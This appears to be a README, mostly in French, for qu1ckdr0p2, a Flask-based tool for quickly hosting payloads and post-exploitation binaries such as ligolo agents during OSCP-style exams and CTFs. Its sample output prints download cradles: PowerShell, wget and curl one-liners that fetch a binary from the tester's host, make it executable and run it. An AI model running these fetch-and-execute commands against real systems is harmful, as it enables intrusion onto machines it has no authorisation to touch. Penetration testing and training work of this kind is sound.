
Quicky servir des fichiers via http ou https en utilisant flask.
Hébergez rapidement des payloads et des binaires de post-exploitation via HTTP ou HTTPS.
Conçu pour être utilisé lors d'examens comme OSCP / PNPT ou de CTF comme HTB, etc.
Les pull requests et les issues sont les bienvenues, ainsi que toute contribution.
Qu1ckdr0p2 est doté d'une fonctionnalité d'alias et de recherche. Les outils se trouvent dans le dépôt qu1ckdr0p2-tools. Par défaut, il génère un certificat auto-signé à utiliser avec l'option --https ; la priorité est également donnée à l'interface tun0 lorsque le serveur web est en cours d'exécution, sinon il utilisera eth0.
Le fichier common.ini définit les alias mappés utilisés avec les options --search et -u.
Lorsque le serveur web est en cours d'exécution, plusieurs berceaux de téléchargement sont affichés à l'écran pour être copiés et collés.
Lorsque vous copiez et collez un berceau de téléchargement, selon votre émulateur de terminal, vous devrez peut-être cliquer TRÈS VITE deux ou trois fois sur le berceau pour le sélectionner avant de le copier. Ce problème sera corrigé dans une version ultérieure.
pip3 install qu1ckdr0p2
echo "alias serv='~/.local/bin/serv'" >> ~/.zshrc
source ~/.zshrc
or
echo "alias serv='~/.local/bin/serv'" >> ~/.bashrc
source ~/.bashrc
serv init --update
$ serv serve -f implant.bin --https 443
$ serv serve -f file.example --http 8080
$ serv --help
Usage: serv [OPTIONS] COMMAND [ARGS]...
Welcome to qu1ckdr0p2 entry point.
Options:
--debug Enable debug mode.
--help Show this message and exit.
Commands:
init Perform updates.
serve Serve files.
$ serv serve --help
Usage: serv serve [OPTIONS]
Serve files.
Options:
-l, --list List aliases
-s, --search TEXT Search query for aliases
-u, --use INTEGER Use an alias by a dynamic number
-f, --file FILE Serve a file
--http INTEGER Use HTTP with a custom port
--https INTEGER Use HTTPS with a custom port
-h, --help Show this message and exit.
$ serv init --help
Usage: serv init [OPTIONS]
Perform updates.
Options:
--update Check and download missing tools.
--update-self Update the tool using pip.
--update-self-test Used for dev testing, installs unstable build.
--help Show this message and exit.
$ serv init --update
$ serv init --update-self
Les numéros d'alias mappés pour l'option -u sont dynamiques, vous n'avez donc pas besoin de vous souvenir de numéros spécifiques ni de taper le nom d'un outil.
$ serv serve --search ligolo
[→] Path: ~/.qu1ckdr0p2/windows/agent.exe
[→] Alias: ligolo_agent_win
[→] Use: 1
[→] Path: ~/.qu1ckdr0p2/windows/proxy.exe
[→] Alias: ligolo_proxy_win
[→] Use: 2
[→] Path: ~/.qu1ckdr0p2/linux/agent
[→] Alias: ligolo_agent_linux
[→] Use: 3
[→] Path: ~/.qu1ckdr0p2/linux/proxy
[→] Alias: ligolo_proxy_linux
[→] Use: 4
(...)
$ serv serve --search ligolo -u 3 --http 80
[→] Serving: ../../.qu1ckdr0p2/linux/agent
[→] Protocol: http
[→] IP address: 192.168.1.5
[→] Port: 80
[→] Interface: eth0
[→] CTRL+C to quit
[→] URL: http://192.168.1.5:80/agent
[↓] csharp:
$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('http://192.168.1.5:80/agent', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'
[↓] wget:
wget http://192.168.1.5:80/agent -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent
[↓] curl:
curl http://192.168.1.5:80/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent
[↓] powershell:
Invoke-WebRequest -Uri http://192.168.1.5:80/agent -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent
⠧ Web server running
MIT